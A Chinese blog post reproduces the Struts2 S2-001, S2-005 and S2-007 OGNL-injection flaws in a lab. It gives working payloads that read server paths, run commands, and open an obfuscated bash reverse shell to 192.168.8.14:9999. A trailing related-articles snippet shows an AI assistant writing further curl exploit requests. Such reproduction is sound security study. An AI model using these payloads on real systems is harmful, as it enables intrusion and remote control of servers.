struts2框架漏洞复现

最新推荐文章于 2025-06-11 16:00:43 发布
最新推荐文章于 2025-06-11 16:00:43 发布
阅读量6.1k 收藏 6
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: struts 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guo15890025019/article/details/122359686
本文详细介绍了Struts2框架中的三个严重远程代码执行漏洞:S2-001、S2-005和S2-007。这些漏洞允许攻击者通过OGNL表达式注入执行任意代码,影响范围涵盖Struts2多个版本。漏洞复现部分展示了如何利用这些漏洞获取服务器敏感信息甚至执行命令。了解这些漏洞有助于提升网络安全防护能力。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

1、S2-001远程代码执行漏洞(CVE-2007-4556)

漏洞简介

当用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。

影响范围

Struts 2.0.0 - 2.0.8

漏洞复现

输入%{1+1},返回2就是存在该漏洞。

在这里插入图片描述
在这里插入图片描述
获取tomcat路径

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

获取网站真实路径

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

S2-005 远程代码执行漏洞(CVE-2010-1870)

漏洞简介

s2-005漏洞起源于s2-003(受影响版本:低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过导致漏洞,攻击者可以利用OGNL表达式将这两个选项打开

影响版本

Struts 2.0.0 - 2.1.8.1

绕过过程

在S2-003中\u0023用于绕过Struts2的过滤器#

在s2-003,struts2添加安全模式(沙盒)之后

在s2-005中,使用OGNL表达式关闭安全模式并再次绕过

漏洞复现

访问漏洞环境
在这里插入图片描述
BP抓包
在这里插入图片描述
修改请求方法为POST
构造执行命令

(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1

在这里插入图片描述
在这里插入图片描述

3、S2-007远程代码执行漏洞(CVE-2012-0838)

漏洞简介

age来自用户输入,传递一个非整数给id导致错误,struts2会将用户的输入当作ongl表达式执行,从而导致漏洞,当 -vaildation.xml 配置的验证规则。如果类型验证转换失败,则服务器将拼接用户提交的表单值字符串,然后执行OGNL表达式解析并返回。
当用户age以str的形式提交int时,服务器"’" + value + "’"将对代码进行拼接,然后使用OGNL表达式对其进行解析。我们需要找到一个配置有相似验证规则的表单字段,以产生转换错误。然后,您可以通过注入SQL单引号的方式注入任何OGNL表达式代码

影响范围

Struts 2.0.0 - 2.2.3

漏洞复现

在这里插入图片描述
在这里插入图片描述
在年龄框中输入非数字型点击登录,年龄框的数字变化如上图,证明漏洞存在
查看根目录

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls /').getInputStream())) + '

或者

%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ls%20/%27%29.getInputStream%28%29%29%29+%2B+%27

在这里插入图片描述
反弹shell

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguMTQvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}').getInputStream())) + '

或者

%27%20%2b%20%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%22%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%22%5d%3d%74%72%75%65%2c%23%66%6f%6f%3d%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%42%6f%6f%6c%65%61%6e%28%22%66%61%6c%73%65%22%29%20%2c%23%63%6f%6e%74%65%78%74%5b%22%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%22%5d%3d%23%66%6f%6f%2c%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4f%54%49%75%4d%54%59%34%4c%6a%67%75%4d%54%51%76%4f%54%6b%35%4f%53%41%77%50%69%59%78%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%20%2b%20%27

在这里插入图片描述

圣乔ERP login.action Struts2 RCE漏洞复现
iSee857的博客
11-27 261
圣乔ERP系统使用Struts2开发框架组件,存在历史遗留漏洞,攻击者可无需身份认证直接利用Struts2的Nday进行远程代码执行,使系统处于极度不安全状态。
Struts2-048漏洞复现
hongji728696的博客
09-11 1059
struts2是一个apache的框架,存在反序列化漏洞,在struts2中存在OGNL表达式,OGNL表达式的二次解析导致这一漏洞
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
关于解决 Apache_Struts2漏洞(S2-045,CVE-2017-5638),包含说明与所需资源
Struts2的几个漏洞复现
Z_rr2004的博客
07-08 943
将Content-Type: application/x-www-form-urlencoded改为Content-Type: application/xml。可通过注入OGNL语言进行命令执行。启用Struts REST插件并使用XStream组件对XML进行反序列操作时,未对数据进行有效验证,可进行远程代码执行攻击。(2) docker-compose up -d 启动。
网络安全框架安全漏洞分析
最新发布
anquan2233的博客
06-11 1019
Struts2 是一个基于 MVC(Model-View-Controller)设计模式的 Web 应用框架,本质上可以看作是对 Servlet 的高级封装。在 MVC 架构中,Struts2 作为控制器(Controller)负责接收用户请求,并协调模型(Model)与视图(View)之间的数据交互。Struts2Struts 的下一代产品,它融合了 Struts 1 和 WebWork 的技术优势,重构并推出了全新的框架架构。
Struts2框架安全缺陷
zbmartin的博客
03-12 324
摘要 本文介绍了java开发流行框架struts2以及webwork的一些安全缺陷,并举例说明框架本身以及开发人员使用框架时,所产生的种种安全问题,以及作者挖掘框架安全漏洞的一些心得体会。 推荐以下人群阅读 了解java开发 了解框架开发 了解web application安全 “网络安全爱好者” 正文 当前java开发网站,通常不会是纯JSP的,大都使用了ja...
漏洞复现Struts2多版本漏洞复现
weixin_42282189的博客
10-12 955
作者:村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 它全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Str.
Struts2漏洞复现
qq_42383069的博客
01-05 4598
一. S2-016复现 打开测试靶场,测试该网站存在index.action路径 漏洞原理: 参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行 测试POC: 2.1 /index.action?redirect:%25{3*4} 2.2 /index.action?redirect:%25%7B3*4%7D (经Url编码) 返回12,说明命令被执行了,即存在该漏洞! 3. 使用K8工具测试: 二. S2-0
漏洞复现-Apache Struts2 文件上传漏洞CVE-2023-50164)
玄道的网安博客
08-11 1728
补丁修复的HttpParameters大小写敏感问题,如果此时通过参数绑定传递MyFaceFileName,在上传表单名中传递myFace(inputName+FileName),此时HttpParameters里面是myFaceFileName与MyFaceFileName,这个时候key不一样,可以同时存在于HttpParameters的。发现对HttpParameters进行了修改,对参数大小写进行了控制,强制将参数都转换成了小写,漏洞和大小写参数有关。
框架漏洞-CVE复现-ThinkPHP+Laravel+Struts+Spring
xiaoheizi的博客
07-16 576
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("要执行的命令")就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。工具:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP。我要执行的是反弹shell命令,需要先对命令进行编码。
struts2 CVE-2020-17530漏洞复现
Armandhe的博客
06-08 1003
我丝毫不敢休息,又肝了一篇
Struts2漏洞利用工具2019版 V2.3.zip
02-24
Struts2漏洞利用工具2019版 V2.3. Struts2漏洞检测工具,请勿非法攻击他人网站,安恒大佬的作品
Vulhub靶场之struts2漏洞复现
weixin_66717977的博客
03-21 1990
struts2漏洞中属s2系列杀伤力最大,本文基于vulhub靶场,将介绍并复现strut2漏洞
漏洞复现Struts2系列
blackpeach的博客
04-22 828
Structs2系列:恶意的OGNL表达式 ,可造成 任意代码执行
Strtus2历史漏洞复现
懂进攻知防守
07-26 1188
S2-015(CVE-2013-2135)原理:如果一个请求与任何其他定义的操作不匹配,它将被匹配*,并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。...
Struts2远程代码执行漏洞复现
玄道的网安博客
07-01 487
环境搭建 docker pull medicean/vulapps:s_struts2_s2-029 docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-029 http://yourIP/default.action打开页面 漏洞利用 (%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true,%23_mem
struts2 action的安全隐患 上
iteye_824的博客
09-13 222
本文介绍了java开发流行框架struts2以及webwork的一些安全缺陷,并举例说明框架本身以及开发人员使用框架时,所产生的种种安全问题,以及作者挖掘框架安全漏洞的一些心得体会。 推荐以下人群阅读: 了解java开发 了解框架开发 了解web application安全 “网络安全爱好者” 正文: 当前java开发网站,通常不会是纯JSP的,大都使用了java framework...
java struts2 漏洞复现合集
whatday的专栏
08-31 8098
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
struts2漏洞复现01
03-14
<think>好的,我需要帮助用户了解如何复现Struts2漏洞,特别是编号为01的漏洞。首先,我需要确定用户提到的“漏洞01”具体指的是哪个CVE编号,因为Struts2有很多漏洞,比如S2-001、S2-005、S2-045等。用户提供的引用中提到了S2-061(CVE-2020-17530)和一些其他漏洞,但不确定用户具体指的是哪一个。不过,用户提到“01”,可能是指早期的一个漏洞,比如S2-001。 接下来,我需要按照用户的要求,整理复现步骤。根据引用内容,用户已经使用docker搭建vulhub环境进行复现,这可能是一个常用的方法。我需要确保步骤包括环境搭建、漏洞利用和结果验证。 同时,用户要求生成相关问题,我需要准备一些相关问题,比如如何搭建测试环境、常见的Struts2漏洞有哪些、如何防御这些漏洞等。需要注意引用标识的正确添加,例如在解释漏洞原理时引用提供的资料。 另外,需要检查LaTeX格式是否正确,虽然Struts2漏洞复现可能涉及较少的数学公式,但如果有变量或代码部分,要确保格式正确。比如在解释OGNL表达式时,可能需要使用行内公式,但可能更多是代码块。 还要确保回答结构清晰,分步骤说明,并引用正确的来源。例如,在解释漏洞原理时引用引用[4],在环境搭建时引用引用[1]。 最后,需要验证复现步骤的准确性,确保命令和代码正确无误,比如使用curl发送恶意请求,或者修改参数触发漏洞。同时提醒用户注意法律和授权问题,确保测试在合法环境下进行。</think>### Struts2漏洞复现方法(S2-001为例) 1. **环境搭建** 使用docker部署vulhub靶场环境: ```bash docker pull vulhub/struts2:2.0.6 docker run -d -p 8080:8080 vulhub/struts2:2.0.6 ``` 该环境包含Struts2 2.0.6版本漏洞组件[^1][^2] 2. **漏洞验证** 发送带有恶意OGNL表达式的POST请求: ```bash curl -X POST "http://目标IP:8080/login.action" \ -d "username=%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vuln-test',233*233)}&password=admin" ``` 响应头中出现`vuln-test: 54289`则存在漏洞[^4] 3. **命令执行** 构造远程命令执行payload: ```http POST /login.action HTTP/1.1 Host: 目标IP:8080 Content-Type: application/x-www-form-urlencoded username=%{#a=@java.lang.Runtime@getRuntime().exec('touch /tmp/poc')}&password=1 ``` 成功执行后服务器将创建`/tmp/poc`文件[^3] 4. **漏洞原理** Struts2框架在参数解析时二次解析OGNL表达式,导致攻击者可通过构造恶意参数实现远程代码执行
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值